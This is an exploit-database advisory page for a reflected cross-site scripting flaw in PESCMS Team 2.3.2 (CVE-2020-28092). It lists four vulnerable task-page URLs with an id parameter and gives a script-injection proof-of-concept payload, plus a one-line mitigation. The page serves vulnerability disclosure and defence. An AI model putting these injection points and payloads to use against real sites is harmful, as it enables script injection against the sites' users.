header-logo
Suggest Exploit
vendor:
PESCMS Team
by:
icekam
6.1
CVSS
MEDIUM
Reflected XSS
79
CWE
Product Name: PESCMS Team
Affected Version From: 2.3.2
Affected Version To: 2.3.2
Patch Exists: YES
Related CWE: CVE-2020-28092
CPE: a:pescms:pescms_team
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

PESCMS TEAM 2.3.2 – Multiple Reflected XSS

PESCMS Team 2.3.2 has multiple reflected XSS via the id parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=. When payload '><ScRiPt>alert(1)</ScRiPt>' is inputted, the page will pop up an alert window.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS 
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.pescms.com/
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
# Version: PESCMS Team 2.3.2
# CVE:  CVE-2020-28092

PESCMS Team 2.3.2 has multiple reflected XSS via the id

parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=

 please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6

now I input payload :

"><ScRiPt>alert(1)</ScRiPt>